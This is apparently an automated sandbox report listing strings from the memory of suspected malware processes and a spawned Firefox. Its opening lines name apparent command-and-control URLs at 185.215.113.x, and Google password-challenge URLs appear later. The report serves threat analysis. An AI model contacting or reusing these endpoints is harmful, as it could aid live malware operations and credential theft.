Source: 6523f73121.exe, 00000009.00000002.3659341926.000000000069C000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpge
Source: 6523f73121.exe, 00000009.00000002.3659341926.0000000000654000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.215.113.206ta
Source: skotes.exe, 00000006.00000003.4489099700.00000000057FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersion
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttp://po
Source: 1c8dd6ecf9.exe, 00000008.00000003.3052227949.0000000001638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.3389538102.000001F4CA2B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3383206866.000001F4C8F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3369975124.000001F4C7578000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242027640.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEBC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242027640.000001F4CEBC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C2026000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C2061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C2026000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C2061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C2026000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.3328507756.000001F4B6803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsp
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4242206198.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3850555176.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3455564696.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3892437070.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: firefox.exe, 0000001C.00000002.3376613883.000001F4C89E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3162411151.000001F4C3FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3220493972.000001F4D05CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE926000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3386470444.000001F4C9D05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3172022849.000001F4C73F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3257014508.000001F4C6FF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3227280479.000001F4CEC63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3235727842.000001F4D05E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3257474992.000001F4CEC54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3403318189.000001F4CEF22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3407925927.000001F4D05E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3365762886.000001F4C6FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3226511900.000001F4D05E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3379563807.000001F4C8CBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3378146105.000001F4C8A90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3237644878.000001F4D05E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3358852217.000001F4C6C60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3397624945.000001F4CEA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3346998807.000001F4C3FD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C20DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001C.00000002.3386470444.000001F4C9D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001C.00000002.3332029856.000001F4C20DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3386470444.000001F4C9D2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sisDownloadsImprovementsAlreadyMigrated
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: 6523f73121.exe, 6523f73121.exe, 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001C.00000003.3313748699.000001F4C9FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2EA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3378975659.000001F4C8B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
Source: firefox.exe, 0000001C.00000002.3379563807.000001F4C8C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul3f
Source: firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulStale
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/places/browser
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/schemas/use
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/autoco
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulonpopupshown=dropmarkerpopupshown
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderSearc
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/firefox-view-notifi
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Global
Source: 6523f73121.exe, 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3397624945.000001F4CEACF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3397624945.000001F4CEACF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.3352798382.000001F4C669E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://youtube.com/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3384980497.000001F4C9CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/_swapBrowserNotifications
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001C.00000002.3369975124.000001F4C7578000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE9C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001C.00000002.3329626750.000001F4B80EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challeng
Source: firefox.exe, 0000001C.00000002.3395867553.000001F4CE9C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3317498172.000000E20B1D8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.3327517171.000001F4B6489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 0000001C.00000002.3376026938.000001F4C8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376613883.000001F4C8931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3338421700.000001F4C2DEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3328507756.000001F4B6811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001C.00000002.3403266675.000001F4CEF13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3328507756.000001F4B686B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://baidu.com
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001120000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3739452522.0000000001120000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 0000001C.00000002.3366625964.000001F4C716A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2EAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180resource://gre/modules/TelemetryTimestamps.sys.m
Source: firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075asyncAppend
Source: firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
